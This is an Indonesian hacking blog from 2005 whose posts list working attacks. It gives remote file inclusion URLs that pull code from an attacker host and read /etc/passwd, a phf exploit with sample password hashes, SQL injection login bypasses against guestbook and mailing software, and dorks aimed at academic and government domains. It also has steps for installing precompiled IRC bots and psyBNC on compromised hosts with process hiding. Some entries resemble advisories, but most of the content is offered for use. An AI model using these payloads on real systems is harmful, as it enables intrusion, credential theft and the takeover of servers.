Friday, December 23, 2005

Syaloom

Seorang teman memberi saya pepatah tua dari negeri cina

Sun-Tzu:"If the enemy leaves a door open, you must rush in."

Yang artinya :

Jika musuh membiarkan pintu terbuka, kita harus masuk menyerbu!

Pepatah itu mengingatkan saya beberapa waktu yang lalu, ketika saya pertama kali belajar membuat psyBNC/Bot, karena kinerja, cara kompilasinya yang rumit, memacu saya untuk mencari skript yang sudah ter compile.

Akhir pencarian saya menemukan Chanarybot/ChanaryPSY (dari chanel #chanary@DALnet) yang kompilasinya begitu mengagumkan (menurut saya waktu itu)

Setelah beberapa waktu yang cukup cukup cukup lama, akhirnya saya menyadari ternyata keduanya memiliki backdoor yang berjalan tanpa kita ketahui, melakukan loggin ke access psy/bot kita serta hal hal yang tidak kita bayangkan.

<fazar>Sun-Tzu:"If the enemy leaves a door open, you must rush in.
<fazar>Jika musuh membiarkan pintu terbuka, kita harus masuk menyerbu!
<fazar>;)
<anak-rimba>wah apa itu
<anak-rimba>itu back dor namanya mas

Bukan salah yang membuat backdoor jika password anda dicuri, karena anda menggunakan/mendapatkannya secara gratis tanpa memeriksanya terlebih dahulu.

Peringatan Pemerintah :
- Baca aturan pakai, jika anda tidak setuju dengan skript orang lain silakan EDIT sendiri, tentu saja tanpa menghilangkan notabane nya.

Read More...

How To 9

PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.

External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

Summary:
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.

Release Date:
January 29 2004

Severity:
High

SecureScout Testcase ID:
TC 17868 (Still in Development)

Vulnerable Systems:
phpGedView version 2.65.1 and prior

Vulnerability Type:
PHP Injection - force the Target to Execute a PHP file from Attackers Server

Vendor Status:
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem

Example:
(HIGH Risk no authentication needed)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.

The attacker has to create on his web site a directory call themes/standard, and a file theme.php

For example: theme.php =

and the request, will execute the phpinfo() command on the vulnerable target.

Credits:
Cedric Cochin - netVigilance Vulnerability Research team

Read More...

Tuesday, December 13, 2005

Thanks To Anymous

say : thx to Anymous, about your comment

Saran anda mengenai PoC di tampung, saya akan berusaha memberikan format PoC yang bagus, karena blog ini bukan security focus/hacking tutorial, hanya sebuah note buat teman teman yang memerlukan

Satu hal yang perlu di ingat, bukan saya yang menemukan bugs/exploit ini, saya hanya merakit, bukan author. Ibarat bom saya tidak bisa bikin eRDeeX/C4, hanya merakit.

Namun saran anda semua akan saya tampung.

Thx.

Read More...

Friday, December 09, 2005

How To 8

'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:

isearch_core.inc.php
isearch_spider.inc.php
i search_search.inc.php

A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

The author indicates that this vulnerability was reported by blackcobra-x.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.isearchthenet.com/isearch/index.php (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: taktau@taktau.cc

Read More...

Tuesday, December 06, 2005

Telnet Chat

Chat To IRC :
But No mIRC, No BitchX, No XChat

Use Telnet

set localecho
irc.telkom.net.id 6667
USER Idnet localhost localhost :Real
NICK nick
JOIN #kecoak
PART #
PRIVMSG # :message
PRIVMSG :message
QUIT :

why Telnet, because 99.9% you can get in all OS, so use this only on emergency situation....!!!

Read More...

Monday, December 05, 2005

How To 4

altavista Dorks :
host:ac.il

http://[target]/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

passwd enkripsi:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh

passwd no enkripsi/no shadow:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh

cara kerja program cracker adalah kurang lebih seperti ini:

1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.

Another Link
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.

Read More...

BOT Precompile

http://h1.ripway.com/xgoogle/zregbot.tar.tar
tar
rm zregbot.tar.tar
cd
cd scripts
http://home.ripway.com/2005-2/261717/buhamtcl.txt
mv ary.tcl
./nadya PID nickbot ident ip channel owner

Read More...

irc-CGI

This summary is not available. Please click here to view the post.

Read More...

How To 5

Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

Target :

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)


It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.

Read More...

PsyBNC Precompile

http://channels.dal.net/bodi/irc/prepsybnc.tar.gz
tar
rm prepsybnc.tar.gz
mv psybnc
cd
rm scripts/DEFAULT.SCRIPT
ps
./kik "process" ./psybnc
/sbin/ifconfig grep inet
cat /etc/hosts
ls -FRla grep drwxrwxrwx

Read More...

How To 2

1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php


Username: ' or 1=1 /*
Password: (Nothing)(Blank)

Read More...

Mac-On-Linux Divider Bar